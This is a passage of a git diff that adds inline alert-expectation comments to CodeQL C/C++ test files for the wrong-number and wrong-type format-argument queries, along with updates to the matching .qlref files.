myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) + myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] myMultiplyDefinedPrintf2("%i", 0); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1, 2); // BAD (too many format arguments regardless of which definition is correct) [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c index 74183c2374f4..5066d606d3f5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c @@ -2,9 +2,9 @@ void test_custom_printf2() { // (implicitly defined) - myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) + myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] myMultiplyDefinedPrintf("%i", 0, 1); // GOOD - myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) + myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] myMultiplyDefinedPrintf2("%i", 0); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1, 2); // BAD (too many format arguments regardless of which definition is correct) [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp index 9c04f7a00490..cf2655400fd6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp @@ -26,9 +26,9 @@ void test_custom_printf() { myClass mc; - mc.myPrintf("%i%i", 1); // BAD (too few format arguments) + mc.myPrintf("%i%i", 1); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] mc.myPrintf("%i%i", 1, 2); // GOOD - mc.myPrintf("%i%i", 1, 2, 3); // BAD (too many format arguments) + mc.myPrintf("%i%i", 1, 2, 3); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] mc.myPrintf(NULL, 1, 2, 3); // GOOD (should not be analyzed) } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp index 4d8257b776b2..e94c4b18caf3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp @@ -9,16 +9,16 @@ extern int printf(const char *fmt, ...); void testMacros(int a, int b, int c) { - GOODPRINTF("%i %i\n", a, b, 0); // BAD: too many format arguments + GOODPRINTF("%i %i\n", a, b, 0); // BAD: too many format arguments // $ Alert[cpp/too-many-format-arguments] GOODPRINTF("%i %i %i\n", a, b, c); // GOOD - GOODPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments + GOODPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments // $ Alert[cpp/wrong-number-format-arguments] - BADPRINTF("%i %i\n", a, b, 0); // DUBIOUS: too many format arguments + BADPRINTF("%i %i\n", a, b, 0); // DUBIOUS: too many format arguments // $ Alert[cpp/too-many-format-arguments] // ^ here there are too many format arguments, but the design of the Macro forces the user // to do this, and the extra argument is harmlessly ignored in practice. Reporting these // results can be extremely noisy (e.g. in openldap). BADPRINTF("%i %i %i\n", a, b, c); // GOOD - BADPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments + BADPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments // $ Alert[cpp/wrong-number-format-arguments] } #define DOTHING(x) \ @@ -29,5 +29,5 @@ void testMacros2() int x; DOTHING(x++); // GOOD - DOTHING(printf("%i", x)); // BAD: the printf inside the macro has too few format arguments + DOTHING(printf("%i", x)); // BAD: the printf inside the macro has too few format arguments // $ Alert[cpp/wrong-number-format-arguments] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c index d10d1025b8f0..df4cd972f502 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c @@ -12,7 +12,7 @@ void test_syntax_error() { (UNDEFINED_MACRO)2); // GOOD [FALSE POSITIVE] - printf("%d%d" + printf("%d%d" // $ Alert[cpp/wrong-number-format-arguments] UNDEFINED_MACRO, 1, 2); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c index 0079d0f0d21b..9da418751bc7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c @@ -4,41 +4,41 @@ extern int printf(const char *fmt, ...); void test(int i, const char *str) { printf("\n"); // GOOD - printf("\n", i); // BAD (too many format arguments) + printf("\n", i); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] - printf("%i\n"); // BAD (too few format arguments) + printf("%i\n"); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%i\n", i); // GOOD - printf("%*s\n", str); // BAD (too few format arguments) + printf("%*s\n", str); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%*s\n", i, str); // GOOD - printf("%i %i %i\n", 1, 2); // BAD (too few format arguments) + printf("%i %i %i\n", 1, 2); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%i %i %i\n", 1, 2, 3); // GOOD // indexed format arguments - printf("%2$i \n", 1); // BAD (too few format arguments) + printf("%2$i \n", 1); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%2$i \n", 1, 2); // GOOD - printf("%2$i \n", 1, 2, 3); // BAD (too many format arguments) + printf("%2$i \n", 1, 2, 3); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] printf("%2$i %2$i %2$i \n", 1, 2); // GOOD printf("%2$02i %1$4.2f \n", 3.3333f, 6); // GOOD { int width, num; - printf("%2$*1$d", 0, width, num); // BAD (too many format arguments) + printf("%2$*1$d", 0, width, num); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] printf("%2$*1$d", width, num); // GOOD - printf("%2$*1$d", width); // BAD (too few format arguments) + printf("%2$*1$d", width); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] - printf("%1$*2$d", 0, num, width); // BAD (too many format arguments) [INCORRECT MESSAGE] - printf("%1$*2$d", num, width); // GOOD [FALSE POSITIVE] + printf("%1$*2$d", 0, num, width); // BAD (too many format arguments) [INCORRECT MESSAGE] // $ Alert[cpp/too-many-format-arguments] + printf("%1$*2$d", num, width); // GOOD [FALSE POSITIVE] // $ Alert[cpp/too-many-format-arguments] printf("%1$*2$d", width); // BAD (too few format arguments) [NOT DETECTED] } { int precision; float num; - printf("%2$.*4$f", 0, 0, num, 0, precision); // BAD (too many format arguments) [INCORRECT MESSAGE] - printf("%2$.*4$f", 0, num, 0, precision); // GOOD [FALSE POSITIVE] - printf("%2$.*4$f", num, 0, precision); // BAD (too few format arguments) [INCORRECT MESSAGE] + printf("%2$.*4$f", 0, 0, num, 0, precision); // BAD (too many format arguments) [INCORRECT MESSAGE] // $ Alert[cpp/too-many-format-arguments] + printf("%2$.*4$f", 0, num, 0, precision); // GOOD [FALSE POSITIVE] // $ Alert[cpp/too-many-format-arguments] + printf("%2$.*4$f", num, 0, precision); // BAD (too few format arguments) [INCORRECT MESSAGE] // $ Alert[cpp/too-many-format-arguments] } printf("%@ %i %i", 1, 2); // GOOD @@ -50,7 +50,7 @@ void test(int i, const char *str) // Implicit logger function declaration my_logger(0, "%i %i %i %i %i %i\n", 1, 2, 3, 4, 5, 6); // GOOD my_logger(0, "%i %i %i\n", 1, 2, 3); // GOOD - my_logger(0, "%i %i %i\n", 1, 2); // BAD (too few format arguments) + my_logger(0, "%i %i %i\n", 1, 2); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] } // A spurious definition of my_logger diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp index 0345e8352bee..e1c086f235ad 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp @@ -23,10 +23,10 @@ void test_size_t() { printf("%zi", &buffer[1023] - buffer); // GOOD printf("%zu", &buffer[1023] - buffer); // GOOD printf("%zx", &buffer[1023] - buffer); // GOOD - printf("%d", &buffer[1023] - buffer); // BAD + printf("%d", &buffer[1023] - buffer); // BAD // $ Alert printf("%ld", &buffer[1023] - buffer); // DUBIOUS [NOT DETECTED] printf("%lld", &buffer[1023] - buffer); // DUBIOUS [NOT DETECTED] - printf("%u", &buffer[1023] - buffer); // BAD + printf("%u", &buffer[1023] - buffer); // BAD // $ Alert // (for the `%ld` and `%lld` cases, the signedness and type sizes match, `%zd` would be most correct // and robust but the developer may know enough to make this safe) } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c index c5b3d1df493a..fa1d7a7ff327 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c @@ -4,7 +4,7 @@ int printf(const char * format, ...); int fprintf(); void f(UNKNOWN_CHAR * str) { - printf("%s", 1); // BAD + printf("%s", 1); // BAD // $ Alert printf("%s", implicit_function()); // GOOD - we should ignore the type sprintf(0, "%s", ""); // GOOD fprintf(0, "%s", ""); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c index f94e01251eec..19e84bf15178 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c @@ -1,5 +1,5 @@ void f() { char buf[35]; - __builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%s", 1); + __builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%s", 1); // $ Alert __builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%d", 1); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp index 5762ded379db..0024faa557eb 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp @@ -15,34 +15,34 @@ void tests() { char16_t buffer[BUF_SIZE]; printf("%s", "Hello"); // GOOD - printf("%s", u"Hello"); // BAD: expecting char - printf("%s", L"Hello"); // BAD: expecting char + printf("%s", u"Hello"); // BAD: expecting char // $ Alert + printf("%s", L"Hello"); // BAD: expecting char // $ Alert - printf("%S", "Hello"); // BAD: expecting wchar_t or char16_t + printf("%S", "Hello"); // BAD: expecting wchar_t or char16_t // $ Alert printf("%S", u"Hello"); // GOOD printf("%S", L"Hello"); // GOOD wprintf(L"%s", "Hello"); // GOOD - wprintf(L"%s", u"Hello"); // BAD: expecting char + wprintf(L"%s", u"Hello"); // BAD: expecting char // $ Alert wprintf(L"%s", L"Hello"); // BAD: expecting char [NOT DETECTED; correct on Microsoft platforms] wprintf(L"%S", "Hello"); // BAD: expecting wchar_t [NOT DETECTED; correct on Microsoft platforms] - wprintf(L"%S", u"Hello"); // BAD: expecting wchar_t + wprintf(L"%S", u"Hello"); // BAD: expecting wchar_t // $ Alert wprintf(L"%S", L"Hello"); // GOOD swprintf(buffer, BUF_SIZE, u"%s", "Hello"); // GOOD swprintf(buffer, BUF_SIZE, u"%s", u"Hello"); // BAD: expecting char [NOT DETECTED; correct on Microsoft platforms] - swprintf(buffer, BUF_SIZE, u"%s", L"Hello"); // BAD: expecting char + swprintf(buffer, BUF_SIZE, u"%s", L"Hello"); // BAD: expecting char // $ Alert swprintf(buffer, BUF_SIZE, u"%S", "Hello"); // BAD: expecting char16_t [NOT DETECTED; correct on Microsoft platforms] swprintf(buffer, BUF_SIZE, u"%S", u"Hello"); // GOOD - swprintf(buffer, BUF_SIZE, u"%S", L"Hello"); // BAD: expecting char16_t + swprintf(buffer, BUF_SIZE, u"%S", L"Hello"); // BAD: expecting char16_t // $ Alert swprintf(buffer, BUF_SIZE, u"%hs", "Hello"); // GOOD - swprintf(buffer, BUF_SIZE, u"%hs", u"Hello"); // BAD: expecting char - swprintf(buffer, BUF_SIZE, u"%hs", L"Hello"); // BAD: expecting char + swprintf(buffer, BUF_SIZE, u"%hs", u"Hello"); // BAD: expecting char // $ Alert + swprintf(buffer, BUF_SIZE, u"%hs", L"Hello"); // BAD: expecting char // $ Alert - swprintf(buffer, BUF_SIZE, u"%ls", "Hello"); // BAD: expecting char16_t + swprintf(buffer, BUF_SIZE, u"%ls", "Hello"); // BAD: expecting char16_t // $ Alert swprintf(buffer, BUF_SIZE, u"%ls", u"Hello"); // GOOD - swprintf(buffer, BUF_SIZE, u"%ls", L"Hello"); // BAD: expecting char16_t + swprintf(buffer, BUF_SIZE, u"%ls", L"Hello"); // BAD: expecting char16_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp index 3c9b802a7a74..7f2f3fb8d675 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp @@ -11,7 +11,7 @@ void test_32() void *void_ptr; printf("%li", l); // GOOD - printf("%li", void_ptr); // BAD - printf("%p", l); // BAD + printf("%li", void_ptr); // BAD // $ Alert + printf("%p", l); // BAD // $ Alert printf("%p", void_ptr); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp index 6b38c4e0245c..05b3d950b199 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp @@ -11,7 +11,7 @@ void test_64() void *void_ptr; printf("%li", l); // GOOD - printf("%li", void_ptr); // BAD - printf("%p", l); // BAD + printf("%li", void_ptr); // BAD // $ Alert + printf("%p", l); // BAD // $ Alert printf("%p", void_ptr); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h @@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp index 9b26de4f54ef..971fa07446d0 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp @@ -12,7 +12,7 @@ struct S { template void template_func_calling_printf(S &obj) { ::printf("%d\n", obj.get_int()); - ::printf("%d\n", obj.get_template_value()); + ::printf("%d\n", obj.get_template_value()); // $ Alert } void instantiate() { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c index bc6468c593b5..75af114da683 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c @@ -8,5 +8,5 @@ void restrict_cases(char * restrict str1, const char * restrict str2, short * re { printf("%s", str1); // GOOD printf("%s", str2); // GOOD - printf("%s", str3); // BAD + printf("%s", str3); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h index 2cc67497c6e1..7157e8fbb6e2 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h @@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } @@ -110,8 +110,8 @@ void extensions() printf("%Lg", ld); // GOOD printf("%llg", ld); // GOOD (nonstandard equivalent to %Lg) - printf("%Lg", d); // BAD (should be %g) - printf("%llg", d); // BAD (should be %g) + printf("%Lg", d); // BAD (should be %g) // $ Alert + printf("%llg", d); // BAD (should be %g) // $ Alert } { @@ -144,8 +144,8 @@ void fun4() long long ll; unsigned long long ull; - printf("%qi\n", i); // BAD - printf("%qu\n", ui); // BAD + printf("%qi\n", i); // BAD // $ Alert + printf("%qu\n", ui); // BAD // $ Alert printf("%qi\n", l); // GOOD printf("%qu\n", ul); // GOOD printf("%qi\n", ll); // GOOD @@ -157,82 +157,82 @@ void complexFormatSymbols(int i, const char *s) // positional arguments printf("%1$i", i, s); // GOOD printf("%2$s", i, s); // GOOD - printf("%1$s", i, s); // BAD - printf("%2$i", i, s); // BAD + printf("%1$s", i, s); // BAD // $ Alert + printf("%2$i", i, s); // BAD // $ Alert // width / precision printf("%4i", i); // GOOD printf("%.4i", i); // GOOD printf("%4.4i", i); // GOOD - printf("%4s", i); // BAD - printf("%.4s", i); // BAD - printf("%4.4s", i); // BAD + printf("%4s", i); // BAD // $ Alert + printf("%.4s", i); // BAD // $ Alert + printf("%4.4s", i); // BAD // $ Alert printf("%4s", s); // GOOD printf("%.4s", s); // GOOD printf("%4.4s", s); // GOOD - printf("%4i", s); // BAD - printf("%.4i", s); // BAD - printf("%4.4i", s); // BAD + printf("%4i", s); // BAD // $ Alert + printf("%.4i", s); // BAD // $ Alert + printf("%4.4i", s); // BAD // $ Alert // variable width / precision printf("%*s", i, s); // GOOD - printf("%*s", s, s); // BAD - printf("%*s", i, i); // BAD + printf("%*s", s, s); // BAD // $ Alert + printf("%*s", i, i); // BAD // $ Alert printf("%.*s", i, s); // GOOD - printf("%.*s", s, s); // BAD - printf("%.*s", i, i); // BAD + printf("%.*s", s, s); // BAD // $ Alert + printf("%.*s", i, i); // BAD // $ Alert printf("%*.4s", i, s); // GOOD - printf("%*.4s", s, s); // BAD - printf("%*.4s", i, i); // BAD + printf("%*.4s", s, s); // BAD // $ Alert + printf("%*.4s", i, i); // BAD // $ Alert printf("%4.*s", i, s); // GOOD - printf("%4.*s", s, s); // BAD - printf("%4.*s", i, i); // BAD + printf("%4.*s", s, s); // BAD // $ Alert + printf("%4.*s", i, i); // BAD // $ Alert printf("%*.*s", i, i, s); // GOOD - printf("%*.*s", s, i, s); // BAD - printf("%*.*s", i, s, s); // BAD - printf("%*.*s", i, i, i); // BAD + printf("%*.*s", s, i, s); // BAD // $ Alert + printf("%*.*s", i, s, s); // BAD // $ Alert + printf("%*.*s", i, i, i); // BAD // $ Alert // positional arguments mixed with variable width / precision printf("%2$*1$s", i, s); // GOOD - printf("%2$*2$s", i, s); // BAD - printf("%1$*1$s", i, s); // BAD + printf("%2$*2$s", i, s); // BAD // $ Alert + printf("%1$*1$s", i, s); // BAD // $ Alert printf("%2$*1$.4s", i, s); // GOOD - printf("%2$*2$.4s", i, s); // BAD - printf("%1$*1$.4s", i, s); // BAD + printf("%2$*2$.4s", i, s); // BAD // $ Alert + printf("%1$*1$.4s", i, s); // BAD // $ Alert printf("%2$.*1$s", i, s); // GOOD - printf("%2$.*2$s", i, s); // BAD - printf("%1$.*1$s", i, s); // BAD + printf("%2$.*2$s", i, s); // BAD // $ Alert + printf("%1$.*1$s", i, s); // BAD // $ Alert printf("%2$4.*1$s", i, s); // GOOD - printf("%2$4.*2$s", i, s); // BAD - printf("%1$4.*1$s", i, s); // BAD + printf("%2$4.*2$s", i, s); // BAD // $ Alert + printf("%1$4.*1$s", i, s); // BAD // $ Alert printf("%2$*1$.*1$s", i, s); // GOOD - 